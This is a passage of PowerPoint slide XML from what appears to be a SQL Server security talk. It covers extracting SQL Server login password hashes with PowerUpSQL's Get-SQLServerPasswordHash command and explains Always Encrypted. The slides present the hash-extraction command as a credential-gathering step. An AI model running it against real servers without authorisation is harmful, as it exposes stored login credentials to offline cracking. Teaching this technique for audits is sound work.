                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>ValidateCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>NoDefaults</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867"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2696303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1E8C-310C-6C4E-A992-0DF03CAB8CEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Extracting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>hashes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A41BDCF1-7289-C840-B312-AE7DD4A73A6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>interested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>knowing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>commonly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Extracting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>assist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>us</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>PowerUpSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> has a very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>called</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>GetSQLServerPasswordHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>automates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>extracting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>procedure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>us</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1DAA59C-1381-374F-828C-326D53A53950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541173" y="2745512"/>
            <a:ext cx="11041227" cy="379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1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get-SQLServerPasswordHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Verbose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> -Instance SQL</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCD316E7-ADFC-D247-97AA-132C37E021C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="5978"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295467" y="3259803"/>
            <a:ext cx="9601067" cy="2783339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1894588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B34-8508-4776-AA85-A2AA2AFB51A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Always Encrypted</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C85D7E-02BC-4592-B249-3BA2AB548E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1524000"/>
            <a:ext cx="12192000" cy="21925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5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79787839-8C9B-4DFD-9828-1563FFA81757}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="263949" y="1658380"/>
            <a:ext cx="11660369" cy="18792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182880" tIns="91440" rIns="182880" bIns="9144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3505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="85000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Always Encrypted allows clients to encrypt sensitive data within client applications without revealing the encryption keys to the Database Engine. As a result, Always Encrypted separates those who own the data and can view it from those who manage the data but should not have access.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF">
                  <a:lumMod val="85000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Light"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB57D672-B1A8-437F-8987-7C4C019BD542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="263948" y="3923071"/>
            <a:ext cx="11660369" cy="156332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182880" tIns="91440" rIns="182880" bIns="9144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3505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Always Encrypted makes encryption transparent to applications. An Always Encrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>enabled driver installed on the client computer automatically encrypts and decrypts sensitive data within the client application. The driver encrypts the data in sensitive columns before passing it to the Database Engine, and automatically rewrites queries so the semantics to the application are preserved. Similarly, the driver transparently decrypts data stored in encrypted database columns and contained in query results. </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221551751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A3F6178E-9C1E-4915-84C7-A612B35E1B7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="12192000" cy="149497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54" name="Title 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269240" y="124411"/>
            <a:ext cx="11135360" cy="1513889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="143349" tIns="89594" rIns="143349" bIns="89594" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="931863" rtl="0" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="5199" kern="1200" spc="-102">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protect your data at rest and in motion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>without affecting database performance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8367E6F-1EFC-48BD-97F7-8A9C62DA40CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="386554" y="1708916"/>
            <a:ext cx="11398762" cy="4917493"/>
            <a:chOff x="386554" y="1607316"/>
            <a:chExt cx="11398762" cy="4917493"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="110" name="Rectangle 109"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="467487" y="1607316"/>
              <a:ext cx="11290410" cy="4917493"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D3EEF9"/>
            </a:solidFill>
            <a:ln w="63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3" tIns="143370" rIns="179213" bIns="143370" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913143" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="196"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="784"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1960" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="112" name="Straight Connector 111"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6433151" y="1645150"/>
              <a:ext cx="15284" cy="4844371"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="635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608222" y="1692081"/>
              <a:ext cx="3082416" cy="271485"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913143" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1764"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t>Always Encrypted</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1764" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="30000" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="68217A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="129" name="Right Arrow 128"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6523595" y="3103737"/>
              <a:ext cx="1096839" cy="194160"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 42077"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="131" name="Right Arrow 130"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6529676" y="4146053"/>
              <a:ext cx="914032" cy="194160"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 42077"/>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="132" name="Group 131"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4177062" y="2870065"/>
              <a:ext cx="915126" cy="427832"/>
              <a:chOff x="4324882" y="3030591"/>
              <a:chExt cx="915624" cy="428066"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="133" name="TextBox 132"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4324882" y="3030591"/>
                <a:ext cx="915624" cy="184251"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="182755" tIns="146203" rIns="182755" bIns="146203" rtlCol="0">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="931136" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                  <a:spcBef>
